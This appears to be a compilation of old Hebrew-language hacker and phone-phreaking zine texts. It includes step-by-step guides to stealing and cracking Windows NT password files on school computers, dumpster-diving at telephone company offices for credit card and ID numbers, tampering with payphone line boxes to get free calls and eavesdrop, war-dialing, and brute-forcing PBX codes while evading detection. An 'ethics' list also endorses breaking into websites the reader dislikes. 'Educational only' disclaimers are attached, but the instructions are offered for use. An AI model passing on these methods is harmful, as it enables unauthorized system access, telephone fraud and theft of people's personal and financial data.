‫אם אתה רוצה להמשיך ולהיות מפצח אתה חייב לדעת שחלק מהיותך מפצח זה ללמוד שפות תכנות‬
‫שונות‪ ,‬למד ככל שתוכל ואז תוכל לקבל שליטה על כל מה שמתבצע בתוך תוכנית מכל סוג ומכל שפה‬
‫ולנתב אותה לפי רצונך וזאת בעצם התכלית של הקראקינג‪.‬‬
‫מקווה שנהנית מהמדריך ‪zeos -‬‬

‫פריצת סיסמאות ב‪windows nt‬‬
‫אהלן!‬
‫‪ e-man‬כאן‪.‬‬
‫אז מה?‬
‫בית ספר החליט להתקין ‪ ?winnt‬יופי‪ ...‬שיחנקו אייתו‪.‬‬
‫והכי טוב שאתם תחנקו אותם נכון?‬
‫במה להצטייד?‬
‫ציוד חובה‪:‬‬
‫ דיסקט‬‫ציוד רשות‪:‬‬
‫ דיסקט ‪ntfsdos‬‬‫ ‪nt resource kit‬‬‫אז ככה‪:‬‬
‫איך לחפש את קובץ הסיסמאות?‬
‫פשוט ככה‪:‬‬
‫אם זה ‪ winnt 4.0‬ומטה‪ ,‬חפשו את הקובץ _‪sam.‬‬
‫אם זה ‪ winnt5.0‬ומעלה‪ ,‬חפש את הקובץ ‪sam‬‬
‫מהו ה‪?sam-‬‬
‫ראשי התיבות של ‪ sam‬הם ‪security accounts manager‬‬
‫או בעברית‪ :‬מנהל אבטחת חשבונות‪.‬‬
‫יש כמה שיטות לפרוץ את הקובץ הזה‪.‬‬
‫שיטה ‪ :1‬תנסו להשיג את התוכנה ‪ .r-disk‬זאת לא תוכנת פריצה‪ ,‬תוכנה זאת‪ ,‬של מיקרוסופט‬
‫בעצמה‪ ,‬מגבה את כל המידע הנחוץ של מערכת ההפעלה על דיסקט‪ .‬זה‬
‫כולל גם סיסמאות! פשוט השתמשו בתוכנה על מנת להשיג את הקובץ‪.‬‬
‫שיטה ‪ :2‬הסיסמאות הכי מעודכנות נמצאות בתיקיה ‪ .winnt/system32/config‬גם כן הם על _‪sam.‬‬
‫או על ‪.sam‬‬
‫אבל למשתמש רגיל‪ ,‬מה שאנחנו (בינתיים) אין גישה לשם‪.‬‬
‫אל דאגה! פשוט השתמשו בדיסקט ‪ ntfsdos‬כשאתם עושים ‪.restart‬‬
‫עכשיו תוכלו להכנס לספריה הזאת ולהעתיק את הקובץ לדיסקט‪.‬‬
‫שיטה ‪ :3‬עותק של הסיסמאות נמצא גם ב‪ ,registry‬אבל משתמש רגיל לא יכול להכנס אליו‪.‬‬
‫מה אפשר לעשות? להשתמש בתוכנה (שוב‪ ,‬מבית מיקרוסופט) ‪ regback.exe‬מה ‪nt resource kit‬‬
‫שמעתיקה את הסיסמאות לדיסקט‪.‬‬
‫שיטה ‪:4‬‬
‫*** שיטה זאת מיועדת רק למומחים ולאלה שלא מוותרים בקלות‪.‬‬
‫בקובץ ה‪ swap‬של ‪ winnt‬מאוחסנות הסיסמאות בטקסט רגיל! אבל שוב‪ ,‬אי אפשר לחפש בו כי‬
‫המערכת משתמשת בו‪.‬‬
‫מה עושים? משתמשים ב‪ ntfsdos‬כדי להכנס ל‪ dos‬ומעתיקים את הקובץ ‪ swapfile.sys‬למקום אחר‬
‫על ההארד דיסק‪.‬‬
‫** שימו לב‪ :‬מעתיקים! לא מעבירים!‬

‫נכנסים לווינדוס ופשוט מחפשים בקובץ כשמשתמשים ב‪ notepad‬כדי לקרוא אותו‪.‬‬
‫לשיטה ‪ 2 ,1‬ו‪:3‬‬
‫עכשיו‪ ,‬כשיש לנו את הקובץ‪ ,‬אנחנו צריכים לפצח אותו‪ .‬הסיסמאות בתוכו מקודדות ואי אפשר‬
‫להשתמש בהם ככה‪.‬‬
‫מה עושים? מורידים תוכנה בשם ‪ l0phtcrack‬מ‪ www.l0pht.com‬ועוקבים אחרי ההוראות בה איך‬
‫להתחיל את תהליך הפיצוח‪.‬‬
‫עכשיו לכו לשחק עם החתול‪ ,‬להציק לאחות או סתם להמשיך לקרוא בזמן שהסיסמאות מופיעות‬
‫לאט לאט מול עינכים‪.‬‬
‫‪.by e-man‬‬

‫האתיקה של ההאקרים עפ"י ‪efraim abramov\oldhacker‬‬
‫”‪“they don't care about us‬‬
‫‪micheal jackson‬‬
‫אל תהיה אף פעם צבוע ‪ -‬להיות צבוע זה הדרגה הכי שפלה שיש באדם ‪ ,‬תהיה אמיתי ‪ ,‬אם אתה ‪1.‬‬
‫רוצה לומר למישהו אמת אמור לו את זה בפנים ואל תרמוז או תנסה להעביר את המסר ברמזים ‪,‬‬
‫‪ !.‬אמור זאת חד וחלק בפנים‬
‫אל תשקר ‪ -‬בעולם ההאקינג ובחיים בכלל אנשים שונאים שקרים ‪ ,‬פעם אחת ידעו ששיקרת יעיפו ‪2.‬‬
‫‪ .‬אותך מכל חברה שיש במיוחד בהאקינג שצריך אמינות רבה‬
‫אל תגנוב אף פעם כסף או רכוש מאדם ‪ -‬לדוגמה אל תגנוב מספרי אשראי של אנשים או חשבונות ‪3.‬‬
‫‪ ...:-( .‬בנקים ותשמש בהם לרע ‪ .‬זכורמה ששלמה ארצי שר ‪ :‬פוליטיקאים וגנבים הם‬
‫אל תתנשא ‪ -‬אל תתנשא בפני אף אחד על הדברים שלמדת מאחרים ואל הדברים שאתה יודע בכלל ‪4.‬‬
‫אלא למד את מי שלא יודע כמו שלימדו אותך וכמו שהספר הזה עושה ‪ ,‬זכור ‪ :‬תמיד יש מישהו שיודע‬
‫‪ .‬יותר טוב ממך ‪ ,‬ובכלל כל המטרה של ההאקרים זה להפיץ את הידע בחינם לכל דורש‬
‫הזהר ורק אח"כ בצע ‪ -‬אם אתה רוצה לפרוץ לאתר שאותו אתה לא כל כך אוהב הזהר את בעל ‪5.‬‬
‫האתר ואמור לו שיוריד את האתר מהרשת ואם הוא לא עושה את דבריך פרוץ את האתר בלי רגשות‬
‫‪ .‬אשמה‬
‫תהיה בן אדם ‪ -‬זכור שהקהילה של האינטרנט היא חברה בדיוק כמו בחיים אלא שברשת אתה ‪6.‬‬
‫‪ .‬אנונומי ולמרות זה תתנהג כמו בן אדם ולא כמו פרא‬
‫‪ .‬בשביל כבוד צריך לעבוד‪7.‬‬
‫‪ " .‬זכור ‪ " :‬מעפר באת ולעפר תשוב ‪8.‬‬

‫‪by efraim abramov \ old-hacker‬‬

‫שקר \ אמת ‪ -‬פריקינג‬
‫‪.‬שקר‪ :‬תופעת הפריקינג מתה‬
‫‪.‬אמת‪ :‬תופעת הפריקינג היא בדעיכה רצינית‪ ,‬אפשר להגיד גוססת‪ ,‬היא לא מה שהייתה בעבר‬
‫‪ )boxes(.‬שקר‪ :‬קופסות פריקרים לא עובדות יותר‬
‫‪.‬אמת‪ :‬כמעט כל הקופסאות לא עובדות אבל יש כמה שעובדות תחת התנאים הנכונים‬
‫‪.‬שקר‪ :‬פריקינג טוב‪/‬מגניב יותר מהאקינג‬
‫‪.‬אמת‪ :‬גם האקינג‪/‬פריקינג‪ ,‬שניהם סוגים של אומנות ממוחשבת ואין דבר כזה טוב יותר מהשני‬
‫‪.‬שקר‪ :‬פריקינג זה דבר רע ואסור‬
‫‪.‬אמת‪ :‬פריקינג זה דבר רע ואסור רק אם עושים בזה שימוש מוטעה ומכוון להרוס דברים‬
‫? שקר‪ :‬אין שימוש לפריקיג‪ ,‬למה צריך את זה בכלל‬
‫אמת‪ :‬פריקינג יכול להיות שימושי מאוד והוא נותן לך ידע על מערכות טלפון שאתה משתמש בהם כל‬
‫‪.‬יום‬
‫‪.‬שקר‪ :‬הנושא העיקרי של פריקינג הוא רק קופסאות‬
‫‪,‬אמת‪ :‬כל יום כאשר נוצרת מערכת טלפון חדשה‪ ,‬יש תת‪-‬נושא חדש לפריקינג‬
‫‪.‬איך לעבוד איתה ומה אפשר לעשות איתה‪ ,‬ידע חדש על מערכת חדשה‬
‫‪.‬שקר‪ :‬פריקינג הוא בטיחותי ביותר‬
‫‪.‬אמת‪ :‬לא נכון‪ ,‬תמיד יש סיכוי שתתחשמל בזמן ביצוע מעשה כלשהו‪ ,‬תמיד צריך להיזהר‬
‫‪.‬שקר‪ :‬כשאני עושה מעשה פריקינג כלשהו‪ ,‬אין לי סיכוי להיתפס‬
‫‪.‬אמת‪ :‬גם לא נכון‪ ,‬תמיד יש סיכוי שמישהו יראה אותך‪ ,‬יתקשר ל ‪ 100‬ואתה נתפס ואוכל אותה‬
‫‪.‬שקר‪ :‬פריקינג זה לא חוקי‬
‫‪.‬אמת‪ :‬זה דווקא אמת‬
‫‪.‬שקר‪ :‬אם אני אקרא את הטקסט הזה אני אהיה פריקר טוב‬
‫‪.‬אמת‪ :‬שוב לא נכון‪ ,‬הטקסט נועד להסביר לכם מעט מידע על פריקינג ואיך להיזהר במעשיכם‬
‫‪by prising‬‬

‫חיפוש במזבלות לפריקרים‬
‫חיפוש במיזבלות לפריקרים‬
‫‪: www.ihc-net.org‬אתר המקור‬
‫‪.‬הערות‪ :‬אני וצוות האתר לא אחראים לכל שימוש לרעה בטקסט‬
‫‪.‬החומר כאן הוא למטרות לימודיות בלבד ואין לבצע את המתואר בטקסט‬
‫?מה זה חיפוש במיזבלות לפריקרים‬
‫הכוונה הוא לחיפוש לניירות (לא בשום דבר מגעיל אני מקווה) במקומות שבהם אפשר‬
‫‪(.‬למצוא מידע לפריקרים‪/‬האקרים (בעיקר במשרדי חברת הטלפון‬
‫?למה לי? מה אני ימצא‬
‫‪:‬אפשר למצוא הרבה דברים‪ ,‬חלקם לפריקרים וחלקם להאקרים‪ .‬הנה רשימה חלקית‬
‫‪.‬ניירות עם מספרי ניסוי של חברת הטלפון *‬
‫‪.‬ניירות עם תיאור השיחות ממספר מסויים *‬
‫‪.‬מספרי תעודת‪-‬זהות ושאר פרטים אישיים של אנשים שונים *‬
‫‪.‬מספרי כרטיסי אשראי של אנשים אחרים על פיתקיות *‬
‫‪.‬מספרי חיוג לרשת שאתה לא אמור לדעת עליהם *‬
‫?מה צריך‬
‫‪////////‬‬
‫(חולצה ישנה ארוכה‪ ,‬נעליים ישנות וזוג מכנסיים ישנים‪( .‬הכול בצבע כהה &‬
‫פנס &‬
‫תיק גדול לניירות &‬
‫‪& walkie talkie‬‬
‫‪ walkie talkie‬חברים (בין ‪ )2-6‬לפחות אחד נמצא בתצפית עם &‬
‫?אוקי‪ ,‬אז מה אני עושה כדי להשיג את זה‬
‫((((((((((((((((((())))))))))))))))))‬
‫קודם כול לך למקום שאתה רוצה לחפש בו (עדיף משרדים של בזק‪ /‬חברות טלפון סלולרי) בזמן האור‬
‫‪.‬ותראה איך המקום נראה‪ ,‬מאיפה נכנסים ואם יש שומרים בחוץ או מנעולים‬
‫‪.‬בלילה לאחר מכן‪ ,‬לך למקום ותיכנס למיזבלה‬
‫‪.‬שם אתה תראה המון פחים גדולים אחד ליד השני‪ ,‬פתח אותם ותסתכל פנימה‬
‫‪.‬רוב מה שתראה הוא נייר‪ ,‬ומה שאתה צריך זה ניירות אז קח הרבה ניירות לתוך התיק וצא מהמקום‬
‫כשאתה מגיע הביתה תסתכל על מה שלקחת‪ ,‬זרוק את הדברים הלא חשובים לפח זבל ברחוב כלשהו‬
‫((לא שלך‬
‫‪.‬וקח את הדברים המעניניים באמת‬
‫אם תמצא דברים מעניניים ממש תוכל לסרוק את זה ולשלוח לי‪ ,‬פינת הפריקינג זקוקה לדברים‬
‫!כאלה‬
‫‪...‬מה אם‬
‫‪:‬תירוצים לשהייה במיזבלה‬
‫‪.‬איבדתי את הכדורגל שלי כאן ‪#‬‬
‫‪.‬אני מחפש ניירות‪/‬אלומיניום למיחזור ‪#‬‬
‫‪.‬אני צריך חוטי טלפון לפרויקט שלי במדעים ‪#‬‬
‫‪.‬אין לי מקום לישון ‪#‬‬
‫‪,‬בכל מקרה‪ ,‬אם תופסים אותך ומבינים מה אתה עושה‬
‫‪.‬אתה יכול להיות מואשם בחציית גבול ולא בשום פשע רציני‬
‫‪,‬תמיד שלכם‬
‫‪by aiti‬‬

‫‪tni box‬‬
‫‪tni box‬‬
‫=======‬
‫‪ - boba smith‬נכתב על ידי‬
‫‪version - 4.0‬‬
‫<<< ‪>>> www.ihc-net.org‬‬
‫הערה‬
‫‪---‬‬‫טקסט זה נכתב למטרות לימודיות בלבד‬
‫אין לי שום אחריות לכל נזק שנגרם עקב קריאת טקסט זה‬
‫תוכן עניינים‬
‫‪-----------‬‬‫‪ tni box‬מה זה ה ‪1.‬‬
‫מה אפשר לעשות איתה ‪2.‬‬
‫? איך אפשר למצוא כאלה קופסאות ‪3.‬‬
‫נתחיל ‪4.‬‬
‫הערות ‪5.‬‬
‫קרדיטים ‪6.‬‬
‫‪ tni box‬מה זה ה ‪1.‬‬
‫‪-----------------‬‬‫( וכל אלה ‪ blue‬זאת קופסא ( לא כמו הקופסאות ‪ tni box‬ה‬
‫שנמצאת ליד טלפון על מטבעות ( קשה למצוא כאלה קופסאות ‪ ,‬הקופסאות יכולות‬
‫( להיות מרוחקות מהטלפון‬
‫ולחפש את הקופסת ה‪tni‬‬
‫מה אפשר לעשות איתה ‪2.‬‬
‫‪--------------------‬‬‫כאשר אתה מוצא את הקופסא אתה יכול לשנות את הקו לקו אמיתי ( לחשבון אמיתי‬
‫( בבזק ‪ ,‬ולא סתם איזה טלפון מזוין על מטבעות‬
‫? איך אפשר למצוא כאלה קופסאות ‪3.‬‬
‫‪-------------------------------‬‬‫את הקופסאות האלה אתה יכול למצוא ליד טלפונים על מטבעות ( המרחק יכול‬
‫‪ ( .‬להיות רחוק מאד ‪ ,‬וזה גם יכול להיות קרוב מאד‬
‫‪ ,‬אם נגיד את הולך לטלפון ואתה רואה מן כזה חוט לאינשהוא תעקוב אחריו‬
‫‪ .‬או אם אתה רואה מן כזה חור שעליו נכנס חוט ‪ ,‬אז תנסה לעקוב אחריו‬

‫נתחיל ‪4.‬‬

‫‪-------‬‬‫‪ .‬לך תחפש את הקופסא ותפתח אותה אם הכלים שאתה צריך ‪1.‬‬
‫אחרי שאתה פותח אותה אתה אמור לראות מן כאלה כבלים ‪2.‬‬
‫‪ .‬שרשום שם את המספרי טלפון‬
‫עכשיו ‪ ,‬תחפש את המספר של הטלפון על המטבעות ואז תחליף‬
‫‪ ( .‬אותו למספר אחר ( למספר רגיל‬
‫‪ .‬תלך לטלפון שאותו שיניתה לטלפון הרגיל ותתקשר חופשי לכל מקום בחינם ‪3.‬‬
‫הערות ‪5.‬‬
‫‪-------‬‬‫זה נותן לך שיחות חינם ‪ beige box ,‬השיטה הזאת זה כמו ‪1.‬‬
‫‪ .‬ונותן לך לצותת לטלפון שעליו עליתה‬
‫שאתה מתחבר לקו הרגיל ‪ ,‬אז תתקשר ל ‪ 110‬זה ישמיע לך את המספר ‪2.‬‬
‫‪ .‬טלפון שעליו התחברת‬
‫אם נגיד אחרי שעשיתה את כל הקטע אם הקופסא ‪ ,‬שאתה תלך להתקשר ‪3.‬‬
‫‪ .‬לא יוכלו לחשוד בך ‪ ,‬אתה תראה כאילו שאתה מתקשר רגיל‬
‫‪by boba smith‬‬

‫רשימת המספרים המיוחדים והקידומות של נזק‬
‫&&& תודה שחייגתם‪ ,‬נזק‪ ,‬נזק &&&‬
‫הערות‪ :‬בקבוצה שלנו לא עושים מעשים בלתי‪-‬חוקיים וכל מידע כאן‬
‫‪.‬הוא למטרות לימודיות בלבד ו^^אין^^ לבצע את האמור בטקסט‬
‫‪.‬ואני חלק מקבוצה זה ‪ www.ihc-net.org‬קובץ זה הורד במקור מ‬
‫‪:‬רשימת המספרים‬
‫משטרה ‪100 -‬‬
‫מגן דויד אדום ‪101 -‬‬
‫מכבי האש ‪102 -‬‬
‫חברת החשמל ‪103 -‬‬
‫שירות לקוחות של נזק ‪199 -‬‬
‫פקס לשירות לקוחות של נזק ‪198 -‬‬
‫לטכנאי נזק ‪110 - ani‬‬
‫שירות יקיצה של נזק ‪175 -‬‬
‫רשות הדואר‪ ,‬שירות מברקים ‪171 -‬‬
‫שירות תיקונים של נזק ‪166 -‬‬
‫שירות תיקונים מיוחדים של נזק ‪164 -‬‬
‫שירות נזקנט‪ ,‬אינטרנט מזדמן ‪135 -‬‬
‫שירות אינטרנט מיוחד‪ ,‬שימוש לחברות שונות ‪136 -‬‬
‫התא קולי של הקו אליו אתה מחובר ‪151# -‬‬
‫שליחת פקסים לשירות תא קולי ‪153 -‬‬
‫מרכזייה בינלאומית ‪1822/1838/1848/188 -‬‬
‫ישראנט‪ ,‬תמסורת ממוחשבת ‪131 -‬‬
‫מודיעין ‪144 -‬‬
‫שירות גוביינא אוטומטית ‪142 -‬‬
‫השעון הדובר ‪155 -‬‬
‫מידע על מספרי טלפון מוחלפים ‪146 -‬‬
‫מוקד עירוני ‪106 -‬‬
‫הפעלת שירות עקוב אחרי ‪72 -‬‬
‫ביטל שירות עקוב אחרי ‪73 -‬‬
‫‪:‬כוכביות וסולמיות‬
‫חייג לאחרון שהתקשר אליך ‪42* -‬‬
‫שירות "חנייה" של נזק‪ ,‬למקרה שיש מספר תפוס ‪41* -‬‬
‫ביטל אפשרות *‪ 42‬ושיחה מזוהה למי שאתה מתקשר אליו ‪43* -‬‬
‫עקוב אחרי במקרה שתפוס ‪73* -‬‬
‫עקוב אחרי במקרה שתפוס או שאין מענה ‪74* -‬‬
‫*ביטול ‪#73 - 73‬‬
‫*ביטול ‪#74 - 74‬‬
‫‪:‬קידומות‬
‫שיחת חינם ‪1800 -‬‬
‫שיחת חינם‪ ,‬לא עובד ברוב אזורי הארץ ‪177 -‬‬
‫שיחה מכל הארץ בתשלום ‪1700 -‬‬
‫קוי זהב ‪012 -‬‬
‫ברק ‪013 -‬‬

‫נזק בינלאומי ‪014 -‬‬
‫שיחה מכל הארץ בתשלום ‪1212 -‬‬
‫אזור ירושלים ויהודה ושומרון ‪02 -‬‬
‫אזור גוש דן והמרכז ‪03 -‬‬
‫אזור חיפה והצפון ‪04 -‬‬
‫אזור השפלה והדרום ‪08 -‬‬
‫‪! ---‬למקרה שאתם מכירים עוד מספרים‪ ,‬אנא פנו אלי ‪----‬‬‫‪,‬תמיד שלכם‬
‫‪by aiti‬‬

‫סריקת מספרי ‪1800‬‬
‫מה זה בכלל ‪?exhange scanning‬‬
‫‪ exhange scanning‬זה כמו דפיקה על כל הבתים ברחוב מסוים ‪ -‬רק שהפעם משתמשים בטלפון‪.‬‬
‫אתה בעצם סורק אזור מסוים של מספרי טלפון‪ ,‬נגיד מ‪ 1800-300-000‬עד ‪ 1800-300-999‬ומחפש‬
‫מספרים מענינים שאתה מוצא‪.‬‬
‫אפשר למצוא מספרי ניסוי שונים של חברת הטלפון‪ ,‬מספרי מודמים שניתן להתחבר אליהם (בעיקר‬
‫להאקרים) ועוד מספרים מענינים שונים‪.‬‬
‫מה אני צריך כדי לסרוק?‬
‫‪ #‬מחשב שיש בו מודם והוא מחובר לטלפון‬
‫‪ #‬את התוכנה ‪ phone tag‬שניתן למצוא באתר‪.‬‬
‫הורדתי את התוכנה‪ ,‬מה עכשיו?‬
‫קודם כל תפתח את התוכנה‪ .‬אתה תראה את המסך הבא‪:‬‬
‫תלחץ על ‪ file - new dial list‬ותקבל את המסך הבא‪:‬‬
‫עכשיו אתה צריך לבחור את טווח המספרים שאתה רוצה לבדוק אותם‪.‬‬
‫אני ממליץ לנסות מספרים של ‪ ,1800‬אבל הבחירה בידיכם‪.‬‬
‫הקישו את התבנית שאתה רוצים‪ ,‬לחצה על ‪ x‬תהיה כמו לחיצה על כל המספרים‪.‬‬
‫לחצו על ‪ ok‬ואז על‬
‫והמודם יתחיל לחייג…‬
‫בזמן שהוא מחייג אתם תראו על המסך את התוצאות‪.‬‬
‫כל מספר שנרשם כתפוס רוב הסיכויים שאין כזה מספר‪.‬‬
‫תרשמו כל מספר שלא נרשם כתפוס אלא נרשם כ‪ carrier‬או כ ‪no carrier‬‬
‫ולאחר מכן תתקשרו לכל המספרים הלא‪-‬תפוסים ותבדקו מה יש בהם‪.‬‬
‫הערות‪ :‬טקסט זה הוא למטרות לימודיות בלבד ואין להשתמש בו‪.‬‬
‫אני לא ממליץ לחייג מעל ‪ 500‬מספרים ביום אחד‪ ,‬בזק יכולה לעלות על זה‪.‬‬
‫אחרי כל סריקה שאתם עושים אתם שולחים את התוצאות אלי…‪.‬‬
‫ותזכרו‪ :‬זה חיוג חינם‪ ,‬אז תתחילו לסרוק!‬
‫‪by aiti‬‬

‫‪pbx‬‬
‫פעם (לפני ‪ 5‬שנים בערך) השתמשו הרבה אנשים בקודים שפורסמו ב‪ bbs‬כדי לעשות שיחות חינם‪,‬‬
‫אני מקווה שבטקסט זה אני "יחזיר עטרה ליושנה" (אוף‪ ...‬אני שונא את ש"ס)‬
‫מה זה בכלל כל הדברים האלו?‬
‫‪--------------------------‬‬‫קודם כל צריך להבין שפי‪.‬בי‪.‬אקס זה לא מאריך‪ ,‬ומאריך זה לא פי‪.‬בי‪.‬אקס‪ ,‬לפעמים מתבלבלים‬
‫בשמות האלו מכיוון שהם משמשים לאותה מטרה‪ :‬לעשות שיחות חינם‬
‫מאריך בדרך כלל שייך לחברת שיחות בינלאומיות גדולה (בזק בינלאומי‪ ,‬קווי זהב‪ ,‬ברק) או חברת‬
‫טלפון בינלאומית‪,‬‬
‫למאריך בדרך כלל יש שתי מטרות‪:‬‬
‫‪ .1‬שאנשים המשלמים על השירות יוכלו להתקשר למספרי טלפון בעזרת קוד מסויים (כמו בזקכרט‪)...‬‬
‫‪ .2‬להוות מספר שאליו מתקשרים כאשר מוכרים לך כרטיס חיוג חד‪-‬פעמי‪ ,‬בו אתה מתקשר למספר‬
‫כלשהוא‪ ,‬מקיש את הקוד ומתקשר‪.‬‬
‫כל מספרי המאריכים נמצאים באזור החיוג חינם של ‪ ,1800‬ולא תוכל למצוא מאריכים באזורי חיוג‬
‫אחרים‪.‬‬
‫כדי למצוא מאריך כדי להשתמש בשיטת הסריקה שכתבתי עליה טקסט‪,‬‬
‫אם אתה מוצא מספר שכאשר אתה מתקשר אליו הוא נותן לך צליל חיוג‪ ,‬יש ‪ 99%‬שמצאת מאריך‪.‬‬
‫כמו כן מספר המבקש ממך את הקוד לחיוג‪ ,‬חייב להיות מאריך‪.‬‬
‫קודם כל צריך למצוא כמה ספרות יש בקוד‪ ,‬אבל בדרך כלל הקול האוטמוטי יגיד לך‪" :‬אנא הכנס את‬
‫הקוד בעל ה‪ 8‬ספרות שלך" וכך תדע כמה ספרות יש‪,‬‬
‫אך לפעמים לא ינתנו לך שום רמזים על מספר הסיפרות‪.‬‬
‫אוקי‪ ,‬עכשיו לפי‪.‬בי‪.‬אקס!‬
‫בדרך כלל פי‪.‬בי‪.‬אקס יהיה שייך לאיזו חברה גדולה‪ ,‬שבדרך כלל יש לה מרכזייה‪.‬‬
‫(דוגמא‪ :‬לאוניברסיטאות בטוח יש פי‪.‬בי‪.‬אקס מכיוון שהם גדולות‪ ,‬יש בהם לרוב שירות לעובדים של‬
‫להתקשר למספר כלשהוא‪ ,‬לתת קוד ולהתקשר למישהוא בנושא עבודה‪ ,‬ותמיד יש לאוניברסיטאות‬
‫מרכזייה)‬
‫בדרך כלל האנשים בחברה יצטרכו לחייג ‪ ,9‬או כל סיפרה אחרת כדי לקבל צליל חיוג‪.‬‬
‫הפי‪.‬בי‪.‬אקס הוא בעצם מספר‪ ,‬שעובדים בחברה אמורים להתקשר אליו ולהקיש את הקוד שלהם‪,‬‬
‫ואז הם יוכלו לחייג חינם למישהוא‪ ,‬למטרות עסקים‪.‬‬
‫פי‪.‬בי‪.‬אקס יכולים להימצא גם באזורי חיוג רגילים (‪ )03,04,08‬וגם באזור חיוג של שיחות חינם (‪.)1800‬‬
‫מאריכים יכולים בדרך כלל להתקשר רק למספרים בתוך הארץ‪,‬‬
‫לעמות זאת‪ ,‬פי‪.‬בי‪.‬אקסים יכולים להתקשר לכל מקום בעולם‪.‬‬
‫חלק ‪ :2‬איך לא להתגלות בפריצה למערכות האלה‬
‫=========================================‬
‫ל ‪ 99%‬מהמאריכים יש את האפשרות לאתר ברגע‪ ,‬ולמצוא את מי שהתקשר‪ ,‬לכן מאוד קשה‪/‬מסוכן‬
‫לפרוץ אליהם בלי שמנהלי המערכת לא ישימו לב‪.‬‬
‫היתרון של פי‪.‬בי‪.‬אקסים הוא שלרובם אין דרך מהירה לאתר‪ ,‬ןהדרך היחידה לאתר את המתקשר‬
‫היא לבדוק את הרישומים אצל בזק (‪ =cama‬סרט מגנטי המתעד כל מספר שאליו התקשרת‪ ,‬אמור‬
‫לשמש למטרות חיוב‪ ,‬אך עדיין ניתן לאתר בעזרתו את המתקשר‪ ,‬הוא קיים במערכות טלפון חדשות‬
‫בלבד)‬
‫מה לא לעשות‪ ( :‬או‪ :‬איך פריקרים נתפסים על הדברים האלה)‬

‫&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&‬
‫‪ .1‬אל תנסה קודים אחד אחרי השני לפי הסדר (‪ )...0001,0002,0003,0004‬אלא תערבבו את הקודים‬
‫כך שיהיו בסדר רנדומלי‪.‬‬
‫‪ .2‬אל תחייגו לאותו פי‪.‬בי‪.‬אקס‪/‬מאריך ‪ 400‬פעמים בשעה אחת‪ ,‬בדרך כלל ישימו לב לזה‪....‬‬
‫‪ .3‬שלא יהיו הפרשים קבועים בזמן בין השיחות‪ ,‬אלא הפרשים רנדומלים‪.‬‬
‫הדרך הכי טובה היא למצוא את הקוד בעזרת הטלפון‪ ,‬ללא שימוש במחשב אלא לנסות קודים רבים‬
‫בעצמך בזמן שאתה רואה סאות' פארק‪....‬‬
‫אם אתה מוצאים קודים‪ ,‬אל תשתגעו ואל תביאו אותם לכל אחד‪ ,‬כי כך הם ימותו מהר מאוד‪...‬‬
‫‪by aiti‬‬

‫המדריך ליצירת צלילים בנוקיה‬
‫‪:‬הערות‬
‫====‪-‬‬‫‪.‬מדריך זה נכתב לצורכי לימוד בלבד‪ ,‬ואין הכותב נושא אחריות כלשהי עקב קריאת מדריך זה‬
‫‪:‬מצרכים‬
‫=======‬
‫נוקיה מהסוג היישן ‪ - 2160\2120‬אם אתם לא יודעים על מה אני מדבר‪ ,‬זה הנוקיה המרובה והדוחה‬
‫‪...‬שהיה לכל הארץ לפני איזה שנתיים‬
‫ידיים‬
‫מוח‬
‫‪:‬הסבר‬
‫=====‬
‫בנוקיה **‪ 21‬לא לקחו בחשבון שיהיה מישהו משועמם שייגלה שיטה שהם משתמשים בה לצורכי‬
‫‪...‬מחקר ובדיקה‬
‫?מה נותנת לנו השיטה‬
‫‪...‬השיטה מאפשרת בעת הצמדת השפורפרת לטלפון מטבעות‪ ,‬להתקשר חינם לכל מקום בעולם‬
‫‪:‬פעולה‬
‫======‬
‫‪:‬תפעילו את המכשיר‪ ,‬לחצו על‬
‫‪menu‬‬
‫ויישר על הכפתור‬
‫‪snd‬‬
‫‪:‬אחר כך הוא יגיד לכם‬
‫‪location number:‬‬
‫‪ [dtmf].‬הכוונה למספר הזיכרון שאותו אתם רוצים לשמוע בצלילים‬
‫‪.‬נגיד אנחנו רוצים לחייג ליוסי‪ ,‬שנמצא אצלינו במספר זיכרון ‪33‬‬
‫‪ ok‬אז אנחנו מקישים ‪ 33‬ולוחצים על‬
‫‪...‬שהוא בעצם הכפתור של התפריט ‪ dtmf‬עכשיו יש לנו אפשרות ללחוץ על‬
‫‪...‬ואיזה פלא‪...‬המכשיר מפיק את צלילי המספרים של הטלפון של יוסי‬
‫עכשיו מה שנותר לנו‪ ,‬זה למצוא טלפון מטבעות ]שקלים[ ולהצמיד אליו את הרמקול של הפלאפון‬
‫‪...‬וגמרנו‬
‫‪...‬אתם צריכים לשמוע צליל חיבור‬
‫!!!תנסו את השיטה על הטלפון בבית‪ ,‬זה אמור לעבוד מכל מקום‪...‬והשיטה עובדת מעולה‬
‫!מה שכן‪ ,‬זה שצריך להיזהר שלא ייתפסו אותכם‪...‬כי אז אתם יכולים להיות עצורים על גניבה‬
‫אבל אל חשש‪....‬פשוט תגידו שאתם משמיעים לחבר שלכם את ההודעה שהחברה המחורמנת שלכם‬
‫‪...‬השאירה לכם אתמול בלילה‬
‫חשוב לציין‪ :‬השיטה נמצאה ביידיי‪...‬ואם היא לא תעבוד אצלכם‪ ,‬אז תשאירו לי הודעה בפורום‪...‬ועוד‬
‫משהו‪...‬סתם שתדעו‪...‬שרוב הטלפונים האלה נמצאים בפיצוחיות הקטנות ובקיוסקים‪...‬בדרך כלל‬
‫בחוץ‪ ,‬ובקניונים בצורת טלפון גדול ובדרך כלל בצבע צהוב‪...‬תהנו‬
‫‪:‬לסיכום‬
‫‪------‬‬‫נוקיה לא חשבה על זה שמישהו יימצא את השיטה ויידע איך להשתמש בה ולאיזה צורך‪ ,...‬אבל‬
‫נוקיה טעתה‪...‬אבל בדגמי הנוקיה החדשים האפשרות הזאת מבוטלת‪...‬כנראה הם קיבלו קצת שכל‬
‫‪...‬האנשים‬
‫‪:‬לפריקרים‬
‫=========‬

‫שאתם צריכים בפשטות רבה‪...‬בלי שום טייפים ‪ hertz‬אתם יכולים עכשיו ליצור את ה‬
‫‪...‬ובלאגנים‪...‬למרות שהטייפ הטוב והיישן עדיין שולט בנו‬
‫‪by cntax‬‬

‫‪:‬רשימת הקופסאות השונות ותפקידם‬
‫אמור לגנוב שיחה ממתינה‪ ,‬שיחה מזוהה ושיחת ועידה במערכות טלפון ישנות* ‪acrylic box -‬‬
‫‪.‬שימוש בקו הטלפון של מישהו אחר ללא רשותו‪ ,‬אחד מהכלים של טכנאי בזק ‪beige box -‬‬
‫‪.‬מי שיתקשר אליך כאשר אתה משתמש בקופסא זו לא יחוייב על השיחה* ‪black box -‬‬
